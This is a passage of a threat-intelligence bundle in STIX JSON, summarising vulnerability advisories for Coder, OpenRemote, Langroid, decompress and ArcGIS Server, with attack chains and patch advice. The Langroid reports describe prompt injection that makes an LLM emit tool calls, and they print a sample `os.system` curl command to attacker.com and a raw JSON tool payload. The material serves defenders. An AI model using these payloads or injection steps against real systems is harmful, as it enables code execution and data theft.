      "description": "## Overview\n\nA significant privilege escalation vulnerability (CVE-2026-55077) has been identified in the Coder platform, impacting several versions including \u003e= 2.34.0, \u003c 2.34.2; \u003e= 2.33.0, \u003c 2.33.8; \u003e= 2.30.0, \u003c 2.32.7; and \u003c 2.29.17. This flaw permits an attacker holding the `user-admin` role to reset the password of any `owner` account without requiring the current password. The vulnerability stems from an insufficient authorization check on the `PUT /api/v2/users/{user}/password` endpoint, which only verified `ActionUpdatePersonal` permissions. This oversight allows a less privileged `user-admin` to effectively seize full administrative control over the Coder deployment, including managing templates, workspaces, licensing, and organization settings. While exploitation requires an existing `user-admin` role, organizations granting this role to less trusted operators are at direct risk.\n\n## Attack Chain\n\n1.  **Initial Access as `user-admin`**: An attacker obtains or is assigned the `user-admin` role within a vulnerable Coder deployment.\n2.  **Target Owner Account**: The attacker identifies the user ID of an account holding the `owner` role.\n3.  **API Password Reset Request**: The attacker crafts and sends a `PUT` request to the `/api/v2/users/{owner_user_id}/password` endpoint, specifying a new password for the owner account.\n4.  **Unauthorized Password Change**: Due to the vulnerability, the Coder application processes the request, resetting the `owner` account's password without validating the requesting user's authorization to modify an owner's credentials or requiring the old password.\n5.  **Owner Account Impersonation**: The attacker authenticates to the Coder platform using the compromised `owner` account with the newly set password.\n6.  **Full Deployment Control**: The attacker, now operating as the `owner`, gains complete administrative control over the Coder deployment, including access to all templates, workspaces, licensing, and organization settings, effectively escalating privileges.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-55077 allows a `user-admin` to elevate their privileges to that of an `owner`. This grants the attacker full control over the Coder deployment, encompassing the ability to manage all templates, workspaces, licensing configurations, and organizational settings. Furthermore, the attacker can self-assign the `owner` role if needed. The primary risk is to organizations that delegate the `user-admin` role to less trusted personnel, as this vulnerability bypasses intended role-based access controls, potentially leading to unauthorized data access, system disruption, or further compromise of integrated systems.\n\n## Recommendation\n\n*   **Patch CVE-2026-55077**: Immediately upgrade affected Coder instances to patched versions v2.34.2, v2.33.8, v2.32.7, or v2.29.17 as appropriate for your release line to remediate CVE-2026-55077.\n*   **Implement Workaround**: Restrict the `user-admin` role to only trusted administrators until the Coder platform can be fully upgraded.\n",
      "published": "2026-07-06T20:56:26Z",
      "labels": [
        "privilege-escalation",
        "web-vulnerability",
        "api-vulnerability",
        "coder"
      ],
      "object_refs": [
        "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-29xf-69gq-m9jx"
        },
        {
          "source_name": "reference",
          "url": "CVE-2026-55077"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--34041cdb-6273-56cc-8d33-a968e066b735",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d375bae1-3216-59e0-bab6-3562aaac171d",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--d375bae1-3216-59e0-bab6-3562aaac171d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Coder SSH Config Injection Vulnerability (CVE-2026-55427)",
      "description": "## Overview\n\nThe `coder config-ssh` utility from Coder is vulnerable to a critical configuration injection issue, tracked as CVE-2026-55427. This vulnerability allows a malicious or compromised Coder server to inject arbitrary SSH configuration directives, such as `ProxyCommand`, into a developer's `~/.ssh/config` file. This occurs because `coder config-ssh` unsafely writes server-supplied values like `HostnameSuffix` and `SSHConfigOptions` without proper sanitization of newlines or restriction of directives. If a developer runs `coder config-ssh` while connected to such a server, it can lead to arbitrary code execution on their workstation with local user privileges. The vulnerability affects Coder versions prior to v2.34.2, v2.33.8, v2.32.7, and v2.29.17. The issue, independently disclosed by Anthropic's Security Team (ANT-2026-22437), highlights a potential supply chain risk through developer tooling.\n\n## Attack Chain\n\n1.  **Initial Access / Server Compromise**: An attacker gains control over a Coder server deployment or compromises its administrative interface, or a Coder server administrator acts maliciously.\n2.  **Configuration Injection**: The attacker modifies the Coder server's `HostnameSuffix` or `SSHConfigOptions` settings to include malicious SSH directives (e.g., `ProxyCommand` followed by a shell command) that exploit the lack of input sanitization.\n3.  **Client-Side Configuration Request**: A developer executes `coder config-ssh` on their workstation (typically Linux or macOS) to configure SSH access to Coder workspaces.\n4.  **Malicious Configuration Download**: The `coder config-ssh` utility fetches the unsanitized configuration values from the compromised Coder server.\n5.  **Local SSH Config Modification**: `coder config-ssh` writes the received malicious `HostnameSuffix` and `SSHConfigOptions` directly into the developer's `~/.ssh/config` file, injecting the attacker-controlled SSH directives.\n6.  **Triggering Execution**: The developer subsequently initiates an SSH connection to any host that leverages the newly modified `~/.ssh/config`.\n7.  **Arbitrary Code Execution**: The injected `ProxyCommand` (or similar directive) within `~/.ssh/config` triggers the execution of the attacker's arbitrary code on the developer's workstation, operating with the privileges of the local user.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-55427 grants attackers arbitrary code execution capabilities on developer workstations. The injected commands run with the privileges of the local user, allowing for a wide range of malicious activities including data exfiltration, installation of malware, establishment of persistence, or further lateral movement within the developer's environment. Crucially, the malicious configuration applies to all SSH connections originating from the workstation, not just those related to Coder workspaces, broadening the scope of impact significantly. While no specific victim count is available, the vulnerability poses a substantial supply chain risk to organizations leveraging the Coder platform, as compromising a single Coder server could lead to compromise of numerous developer endpoints.\n\n## Recommendation\n\n*   Patch CVE-2026-55427 on all affected Coder server deployments to versions v2.34.2, v2.33.8, v2.32.7, or v2.29.17 immediately.\n*   Educate developers to review the output of `coder config-ssh --dry-run` before applying configuration changes to visually identify unexpected SSH directives.\n*   Implement file integrity monitoring on `~/.ssh/config` files on developer workstations to detect unauthorized or suspicious modifications (e.g., via `file_event` logging).\n",
      "published": "2026-07-06T20:55:41Z",
      "labels": [
        "ssh",
        "configuration-injection",
        "rce",
        "supply-chain",
        "developer-tools",
        "vulnerability"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-mcqq-fqgf-rxwm"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--01b0e09b-1506-5d2d-8ffa-f7854bbc1154",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Account Discovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1087",
          "url": "https://attack.mitre.org/techniques/T1087"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e2cba4d4-e1d6-57b2-a654-60919cdbb98d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9bed2030-9b89-547c-801b-883cddda8210",
      "target_ref": "attack-pattern--01b0e09b-1506-5d2d-8ffa-f7854bbc1154"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--9784d16a-c518-5b29-909d-468e2fd57dad",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Permission Groups Discovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1069",
          "url": "https://attack.mitre.org/techniques/T1069"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--09490c6f-b78c-5849-ac7c-84f7ed4fec99",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9bed2030-9b89-547c-801b-883cddda8210",
      "target_ref": "attack-pattern--9784d16a-c518-5b29-909d-468e2fd57dad"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--9bed2030-9b89-547c-801b-883cddda8210",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "OpenRemote Cross-Realm User Information Disclosure (CVE-2026-54641)",
      "description": "## Overview\n\nA high-severity vulnerability, CVE-2026-54641, has been identified in OpenRemote's `openremote-manager` package, affecting versions prior to `1.24.2`. This flaw specifically resides in the `UserResourceImpl.java` file, where three read endpoints (`get`, `getUserClientRoles`, `getUserRealmRoles`) lack an authenticated-realm guard. This oversight allows a realm administrator from any non-master tenant to retrieve sensitive user profile data, client roles, and realm roles belonging to users in other realms, including the highly privileged master realm, simply by supplying the target user's UUID in the REST API path. This cross-tenant information disclosure facilitates user enumeration and privilege reconnaissance, providing attackers with valuable intelligence (usernames, email addresses, role assignments) that can be leveraged for further targeted attacks such as credential stuffing, social engineering, or privilege escalation within multi-tenant OpenRemote deployments.\n\n## Attack Chain\n\n1.  An attacker gains administrator-level access to a non-master OpenRemote tenant, possessing the `read:admin` role.\n2.  The attacker performs reconnaissance to identify a target user's UUID within another realm, typically the privileged master realm, potentially through accessible audit logs, API responses, or provisioning records.\n3.  The attacker authenticates to their controlled non-master tenant (e.g., `tenantb`) and obtains a valid OpenID Connect access token.\n4.  The attacker crafts and sends an authenticated HTTP GET request to the vulnerable `/api/{caller_realm}/user/{target_realm}/{user_id}` endpoint, specifying the master realm as the target (`target_realm`) and the master admin's UUID.\n5.  The attacker proceeds to send an authenticated HTTP GET request to the `/api/{caller_realm}/user/{target_realm}/userRealmRoles/{user_id}` endpoint to retrieve the target master realm user's assigned realm roles.\n6.  Subsequently, the attacker sends an authenticated HTTP GET request to the `/api/{caller_realm}/user/{target_realm}/userRoles/{user_id}/{client_id}` endpoint to gather the target master realm user's client roles.\n7.  Due to the absence of proper authorization checks in `UserResourceImpl.java`, the OpenRemote server inadvertently returns sensitive user profile, realm role, and client role information from the target master realm to the attacker, despite their non-master realm token.\n8.  The attacker utilizes the disclosed user identities, privilege levels, and role assignments to plan and execute subsequent attacks, such as credential stuffing against identified administrator accounts, social engineering campaigns, or exploiting other vulnerabilities for privilege escalation.\n\n## Impact\n\nThis vulnerability allows any realm administrator with `read:admin` permissions in a non-master tenant to enumerate user accounts, obtain email addresses, determine enabled/disabled status, and retrieve the full set of Keycloak roles for any user across all realms, including the most privileged master realm. This breaks tenant isolation in hosted or shared OpenRemote deployments, compromising the confidentiality of user data. The exposure of sensitive master administrator account identities and their extensive role assignments significantly aids in targeted attacks, making credential stuffing, social engineering, and potential privilege escalation much more feasible. Successful exploitation can lead to a complete compromise of the OpenRemote instance if master administrator credentials are subsequently brute-forced or phished.\n\n## Recommendation\n\n*   Immediately patch OpenRemote instances to version `1.24.2` or higher to remediate CVE-2026-54641.\n*   Deploy the Sigma rule in this brief to your SIEM to detect suspicious cross-realm information disclosure attempts.\n*   Monitor webserver logs for HTTP GET requests matching the patterns identified in the Sigma rule, specifically for access to `/api/{non_master_realm}/user/master/*` endpoints by non-master realm administrators.\n",
      "published": "2026-07-06T20:51:11Z",
      "labels": [
        "OpenRemote",
        "Vulnerability",
        "API",
        "Information Disclosure",
        "Access Control",
        "Multi-tenant"
      ],
      "object_refs": [
        "attack-pattern--01b0e09b-1506-5d2d-8ffa-f7854bbc1154",
        "attack-pattern--9784d16a-c518-5b29-909d-468e2fd57dad"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-xqr9-4wvv-gvch"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1fcf85dd-7fdc-5872-8e7a-169549a2c8d3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3a2c216c-9254-5601-a385-27ce3dd3e7b3",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--3a2c216c-9254-5601-a385-27ce3dd3e7b3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Langroid Tool Invocation Bypass via Unverified User Messages (CVE-2026-54771)",
      "description": "## Overview\n\nA critical logic flaw (CVE-2026-54771) has been identified in Langroid applications, affecting versions up to and including 0.65.2. This vulnerability allows untrusted users interacting with a chat interface to directly invoke internal application tools by supplying raw JSON payloads. The `handle_message()` function within the `ChatAgent` lacks proper sender verification, permitting tools registered with `use=False, handle=True` to be executed, which developers might mistakenly believe are protected from direct user invocation. This bypass of intended security controls can lead to unauthorized actions such as file system manipulation, database command execution, or control over internal orchestration tools, posing a significant risk of remote code execution or sensitive data compromise.\n\n## Attack Chain\n\n1. An attacker, as an untrusted user, interacts with a vulnerable Langroid chat application.\n2. The attacker crafts a malicious chat message containing a raw JSON payload designed to invoke a specific internal tool, for example, `{\"request\":\"secret_tool\",\"value\":\"pwned\"}`.\n3. The Langroid `ChatAgent` receives the user's message as input.\n4. The `agent.handle_message()` function is called to process the user's input.\n5. Inside `handle_message()`, the `get_tool_messages()` method parses the raw JSON from the user message, identifying it as a valid `ToolMessage` invocation.\n6. Despite the tool (e.g., `SecretTool`) being configured with `use=False, handle=True`, indicating it should not be directly generated by the LLM or exposed to end-users, its `handle()` method is directly executed.\n7. The `handle()` method performs its intended action, which, depending on the tool, could include reading/writing files, executing database queries, or interacting with internal systems.\n8. The attacker successfully bypasses security mechanisms to achieve unauthorized execution of internal tools, potentially leading to remote code execution or data exfiltration.\n\n## Impact\n\nThe impact of CVE-2026-54771 can be severe, leading to significant compromise of affected systems. Depending on the specific internal tools enabled within the Langroid application, attackers could achieve capabilities such as arbitrary file read and write, direct execution of database queries, or unauthorized access to and manipulation of internal orchestration systems. This could result in sensitive data exfiltration, system defacement, denial of service, or full remote code execution, undermining the integrity, confidentiality, and availability of the application and underlying infrastructure. Developers may have registered these tools with the belief that `use=False` provides sufficient protection, making this vulnerability particularly insidious.\n\n## Recommendation\n\n*   Immediately patch Langroid applications to a version greater than 0.65.2 to address CVE-2026-54771.\n*   Review all `enable_message` configurations within your Langroid applications, especially for sensitive tools, to ensure that only trusted entities can invoke them.\n*   Implement robust input validation and sanitization at the application boundary for all user-supplied chat inputs to prevent raw JSON tool payloads from reaching the `handle_message()` function.\n",
      "published": "2026-07-06T20:45:48Z",
      "labels": [
        "langroid",
        "vulnerability",
        "rce",
        "logic-error",
        "python"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-gjgq-w2m6-wr5q"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--43ead97a-4c00-59fd-a9b4-7c58edb559ed",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: attacker.com",
      "pattern": "[domain-name:value = 'attacker.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T20:44:54Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--64fa3cde-24f7-5a1b-b609-1f945d36321b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a71eddcf-eceb-53be-91c3-dceb513614ef",
      "target_ref": "indicator--43ead97a-4c00-59fd-a9b4-7c58edb559ed"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9b2406a4-95fd-5a9d-9e85-f63e55bb6d64",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a71eddcf-eceb-53be-91c3-dceb513614ef",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--a71eddcf-eceb-53be-91c3-dceb513614ef",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Langroid Sandbox Escape via Incomplete eval() Mitigation",
      "description": "## Overview\n\nAttackers can exploit a critical sandbox escape vulnerability, CVE-2026-54769, in the Langroid framework (versions \u003c= 0.65.1) to achieve unauthenticated Remote Code Execution (RCE). This flaw specifically affects the `TableChatAgent` and `VectorStore` components when configured with `full_eval=True`. The vulnerability stems from an incomplete mitigation in Python's `eval()` function, where the `__builtins__` dictionary is not explicitly scrubbed from `globals`, despite attempts to set `locals` to an empty dictionary. This oversight allows attackers to use prompt injection to force the underlying Large Language Model (LLM) to generate tool calls that include `__import__('os').system()` commands, which are then executed by the vulnerable `eval()` function in `langroid/agent/special/table_chat_agent.py` or `langroid/vector_store/base.py`. This bypass permits arbitrary system command execution, posing a significant risk for data exfiltration, unauthorized database access, or full system compromise.\n\n## Attack Chain\n\n1. An attacker crafts a malicious prompt containing a tool call with an `expression` field set to a Python `os.system()` command (e.g., `__import__('os').system('curl http://attacker.com/pwned')`).\n2. The attacker submits this crafted prompt to a Langroid application instance running a `TableChatAgent` or `VectorStore` configured with `full_eval=True` (e.g., Langroid version \u003c= 0.65.1).\n3. The application's underlying Large Language Model (LLM) processes the malicious prompt and, as instructed, generates a tool message containing the attacker-controlled Python `expression`.\n4. The Langroid agent's `eval()` function (specifically within `table_chat_agent.py` or `base.py`) attempts to execute this `expression` using `eval(code, vars, {})`.\n5. Due to an incomplete sandboxing implementation, where `__builtins__` are implicitly available via `globals` despite an empty `locals` dictionary, the `__import__('os').system()` call within the `expression` is successfully resolved and executed.\n6. The `os.system()` function invokes a new process on the host system to execute the embedded command (e.g., `curl` for C2 communication or `touch` for arbitrary file creation).\n7. This unauthenticated command execution achieves Remote Code Execution (RCE), allowing the attacker to interact with the host system's operating system environment.\n8. The RCE enables further actions such as unauthorized data exfiltration, privilege escalation, or full system compromise.\n\n## Impact\n\nThis vulnerability allows for a complete bypass of the application's intended security boundaries, directly enabling unauthenticated Remote Code Execution. The observed consequences include unauthorized database accesses, data exfiltration, or total system compromise, depending on the privileges of the user environment hosting the vulnerable Langroid agent process. Successful exploitation can lead to significant data breaches, loss of intellectual property, and extensive damage to the affected system and organization.\n\n## Recommendation\n\n*   Patch Langroid to a version greater than 0.65.1 to mitigate CVE-2026-54769.\n*   Block traffic to `attacker.com` at your network perimeter using the IOC provided in this brief.\n*   Deploy the Sigma rules provided in this brief to detect suspicious process creation activities originating from Python processes.\n*   Enable Sysmon process-creation logging (Event ID 1) on Windows or audit logging for process creation on Linux systems to ensure telemetry for the provided rules.\n",
      "published": "2026-07-06T20:44:54Z",
      "labels": [
        "rce",
        "sandbox-escape",
        "llm",
        "python",
        "supply-chain"
      ],
      "object_refs": [
        "indicator--43ead97a-4c00-59fd-a9b4-7c58edb559ed",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-q9p7-wqxg-mrhc"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9952bd76-a18c-5d3c-aca8-d6fdff9f0a4d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8a7b7275-4596-5a71-89d9-42bd8de3c1bb",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Unsecured Credentials",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1552",
          "url": "https://attack.mitre.org/techniques/T1552"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8334b771-d9df-51c1-939a-fe85c107e042",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8a7b7275-4596-5a71-89d9-42bd8de3c1bb",
      "target_ref": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--8a7b7275-4596-5a71-89d9-42bd8de3c1bb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Decompress Archive Extraction Vulnerability Allows Path Traversal and Privilege Escalation (CVE-2026-53486)",
      "description": "## Overview\n\nA critical vulnerability, CVE-2026-53486, affects the `@xhmikosr/decompress` npm package (versions prior to 10.2.1 and between 11.0.0 and 11.1.3) and the unmaintained `decompress` package (all versions up to 4.2.1). This flaw allows an attacker to craft a malicious archive (tar, tar.gz, tar.bz2, zip, or others via plugins) that, when extracted, can read or write files outside the intended target directory. The vulnerability stems from insufficient path containment checks (using a prefix comparison) and improper handling of hardlinks, symlinks, and file modes (failing to remove setuid/setgid bits). This means that extracting an untrusted archive can lead to arbitrary file access, information exposure, and if extraction occurs as a privileged user (e.g., root in CI/CD, containers, or install scripts), potential privilege escalation through the creation of setuid/setgid binaries. The vulnerability is network-reachable as archives are commonly downloaded.\n\n## Attack Chain\n\n1.  **Crafted Archive Creation**: An attacker creates a malicious archive file (e.g., `.tar`, `.zip`) containing specially crafted entries that leverage path traversal sequences (e.g., `../`), hardlinks targeting sensitive files, symlinks pointing outside the target directory, or files with setuid/setgid bits.\n2.  **Delivery**: The malicious archive is delivered to a victim system. This could occur via various methods, such as embedding it in a software supply chain update, a malicious email attachment, or a download from a compromised website.\n3.  **Initiation of Extraction**: An application or script using the vulnerable `decompress` or `@xhmikosr/decompress` library attempts to extract the delivered archive to a specified output directory.\n4.  **Path Traversal/File Write**: Due to the flawed path containment check, the library incorrectly resolves paths for entries like `output/../sibling-dir/malicious_file`, allowing the attacker to write files to arbitrary locations outside the intended extraction directory.\n5.  **Hardlink/Symlink Abuse**: The library creates hardlink entries pointing to sensitive files (e.g., `/etc/shadow`) or symlink entries that redirect subsequent writes or reads to arbitrary locations on the filesystem, exposing or modifying sensitive data.\n6.  **Privilege Escalation**: If the extraction process runs with elevated privileges (e.g., as root), the attacker-crafted archive creates a file with setuid/setgid bits preserved, leading to a privileged executable that the attacker can then invoke for system-wide compromise.\n7.  **Impact**: The attacker achieves arbitrary file write/read, information disclosure (e.g., sensitive configuration files, credentials), or privilege escalation on the affected system, enabling further malicious activities.\n\n## Impact\n\nThe vulnerability allows for severe consequences, including arbitrary file writes, arbitrary file reads, and privilege escalation. If an attacker can deliver a specially crafted archive, they can overwrite critical system files, modify configuration, extract sensitive data like credentials, or create setuid/setgid executables. This is particularly concerning in environments where archive extraction is performed with elevated privileges, such as CI/CD pipelines, container build processes, or automated software installation scripts, leading to full system compromise. Any application that processes untrusted archives using the affected libraries is at risk.\n\n## Recommendation\n\n*   **Patch CVE-2026-53486 immediately**: Upgrade `@xhmikosr/decompress` to version 10.2.1 or 11.1.3 or later.\n*   **Migrate from `decompress`**: For applications using the unmaintained `decompress` package, migrate to `@xhmikosr/decompress` 11.1.3 or later, as `decompress` will not receive a fix for CVE-2026-53486.\n*   **Implement least privilege**: Ensure archive extraction processes are run with the lowest possible privileges to mitigate the impact of CVE-2026-53486, specifically preventing the creation of setuid/setgid files.\n*   **Validate archive contents**: Implement post-extraction validation to check for and reject any symlinks or hardlinks pointing outside the target directory or any files with unexpected mode bits, as a temporary workaround for CVE-2026-53486 if immediate patching is not possible.\n",
      "published": "2026-07-06T20:31:50Z",
      "labels": [
        "vulnerability",
        "path-traversal",
        "privilege-escalation",
        "npm",
        "supply-chain"
      ],
      "object_refs": [
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
        "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-mp2f-45pm-3cg9"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/XhmikosR/decompress/releases/tag/v10.2.1"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/XhmikosR/decompress/releases/tag/v11.1.3"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/XhmikosR/decompress/commit/aca5aac"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/XhmikosR/decompress/commit/281cefa"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/XhmikosR/decompress/commit/60b5299"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-qgfr-5hqp-vrw9"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b19bd8be-ee46-507f-97d9-ae670a3742b2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a57e4bf9-a543-5130-b346-a1fb400bb453",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4e20291b-b4d5-55e1-8d07-8ad7dd6c0472",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a57e4bf9-a543-5130-b346-a1fb400bb453",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--a57e4bf9-a543-5130-b346-a1fb400bb453",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-9181: Unauthenticated Directory Traversal in ArcGIS Server",
      "description": "## Overview\n\nArcGIS Server, a core component of Esri's enterprise geospatial platform, is vulnerable to a critical directory traversal (CWE-22) identified as CVE-2026-9181. This vulnerability affects all versions up to and including 12.0. An unauthenticated attacker can remotely exploit this flaw by submitting specially crafted path parameters within HTTP requests. Successful exploitation grants the attacker the ability to read arbitrary files from the underlying server's file system, potentially leading to the exposure of sensitive configuration files, credentials, or other critical data. This poses a significant risk to the confidentiality of organizations utilizing vulnerable ArcGIS Server deployments. The vulnerability carries a CVSS v3.1 base score of 9.8 (Critical).\n\n## Attack Chain\n\n1. An unauthenticated attacker identifies an internet-facing ArcGIS Server instance running a vulnerable version (12.0 or prior).\n2. The attacker constructs a malicious HTTP request containing specially crafted path parameters (e.g., `../`, `..%2f`) targeting specific endpoints on the ArcGIS Server.\n3. This crafted request exploits the directory traversal vulnerability (CWE-22) in ArcGIS Server's request handling logic.\n4. The server incorrectly resolves the malicious path, allowing the request to access files and directories outside the intended web root or application sandbox.\n5. The attacker can then specify the names of sensitive files (e.g., configuration files, system logs, user data) on the server's file system.\n6. ArcGIS Server retrieves and returns the content of these sensitive files to the attacker, leading to unauthorized information disclosure.\n7. The attacker exfiltrates the accessed sensitive data for further analysis or exploitation.\n\n## Impact\n\nIf exploited, CVE-2026-9181 could lead to severe data breaches, compromising the confidentiality and potentially the integrity of systems hosting ArcGIS Server. Attackers could gain access to configuration files containing database credentials, API keys, or other sensitive information, which could then be used for further lateral movement or privilege escalation within the network. This directly impacts organizations relying on 